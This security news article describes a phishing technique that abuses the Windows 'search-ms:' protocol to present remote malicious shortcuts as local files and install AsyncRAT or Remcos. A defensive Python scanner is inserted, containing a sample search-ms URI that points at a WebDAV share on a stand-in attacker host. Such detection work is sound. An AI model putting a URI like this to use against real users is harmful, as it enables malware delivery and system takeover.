Hackers exploit the search function in Windows Explorer to install remote access Trojans

A JavaScript script from the browser lures users into a clever trap.

Cybersecurity experts have discovered that attackers abuse a legitimate Windows search function to secretly deliver malware to their victims' computers. In this way, hackers can gain full access to the system and steal confidential data.

According to Trellix researchers, criminals abuse the "search-ms:" protocol, which allows applications and links to run a local search on the user's device.

In their attacks, the criminals send phishing emails with malicious links or HTML attachments that redirect the victim to infected sites. These sites run JavaScript code that uses the "search-ms:" protocol to perform a search against a remote server controlled by the attackers.

When the link is clicked, the browser asks for permission to open Windows Explorer. If the user confirms, they are shown what look like local search results — shortcuts with PDF and other familiar icons.

[Image 1: JavaScript request to launch Explorer]

However, these are actually remote malicious files disguised as safe ones. Because they are displayed directly in Windows Explorer, the user does not see the trick and runs the file, thinking it is on their own system. This is how the malware execution starts unnoticed.
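As a defensive illustration (an added example, not code from the post or from Trellix's report), the following Python scanner pulls "search-ms:" URIs out of HTML or JavaScript and flags those whose location crumb points at a remote UNC or WebDAV path instead of a local drive, which is exactly the trick described above. The query, crumb and displayname parameter names come from Microsoft's documented search-ms protocol; the sample snippets and the attacker.example host are constructed placeholders.

```python
import re
from urllib.parse import unquote

# Constructed sample snippets, as a mail gateway or proxy might see them.
# attacker.example is a placeholder, not a real indicator.
SAMPLES = [
    # Legitimate use: a search scoped to a local folder
    'window.location.href = "search-ms:query=report'
    '&crumb=location:C%3A%5CUsers%5Cme%5CDocuments&displayname=Documents";',
    # Suspicious use: a remote WebDAV share (\\host@port\share) shown as "Downloads"
    'location.href = "search-ms:query=invoice'
    '&crumb=location:%5C%5Cattacker.example%4080%5Cshare&displayname=Downloads";',
    # Unrelated script with no search-ms: URI at all
    'fetch("https://cdn.example/app.js");',
]

URI_RE = re.compile(r"search-ms:[^\s\"'<>]+", re.IGNORECASE)


def parse_search_ms(uri):
    """Split a search-ms: URI into its parameters (query, crumb, displayname, ...).
    Values are URL-decoded; repeated keys are kept as a list."""
    body = uri.split(":", 1)[1]
    params = {}
    for part in body.split("&"):
        if "=" in part:
            key, value = part.split("=", 1)
            params.setdefault(key.lower(), []).append(unquote(value))
    return params


def remote_location(params):
    """Return the location a crumb points to if it is off-box (UNC or http(s) WebDAV)."""
    for crumb in params.get("crumb", []):
        if crumb.lower().startswith("location:"):
            loc = crumb[len("location:"):]
            if loc.startswith("\\\\") or loc.lower().startswith(("http://", "https://")):
                return loc
    return None


def scan(text):
    """Return (uri, verdict, detail) for each search-ms: URI found in text."""
    findings = []
    for match in URI_RE.finditer(text):
        uri = match.group(0)
        params = parse_search_ms(uri)
        loc = remote_location(params)
        if loc:
            shown_as = params.get("displayname", ["?"])[0]
            findings.append((uri, "suspicious", f"remote location {loc!r} shown as {shown_as!r}"))
        else:
            findings.append((uri, "local", ""))
    return findings
```

The "suspicious" verdict is what a mail or web filter would act on: a search window whose contents come from a remote share but is labelled like a local folder.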

[Image 2: Malicious shortcut that starts a network library]

When the shortcut is opened, a malicious DLL is executed through the regsvr32.exe utility. In an alternative version of the attack, also identified by the researchers, the shortcuts launch PowerShell scripts that silently download additional payloads.

As a result, the remote access Trojan AsyncRAT or Remcos RAT is installed on the victim's computer, and the hackers gain full control over the system: they can steal data and sell the access to other attackers.

With Microsoft constantly blocking known attack methods, hackers are desperately looking for workarounds, and abusing search protocols is just one such way of circumventing system restrictions.

Experts recommend not clicking on suspicious links or downloading files from unknown sources, so as not to join the list of victims of these inventive cybercriminals.